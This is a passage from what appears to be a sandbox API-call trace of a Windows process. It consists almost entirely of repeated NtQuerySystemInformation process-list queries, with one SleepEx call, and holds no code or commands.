SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19850) returned 0x0 [0141.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x194c8) returned 0x0 [0141.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x195d0) returned 0x0 [0141.679] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0145.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a220) returned 0x0 [0145.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 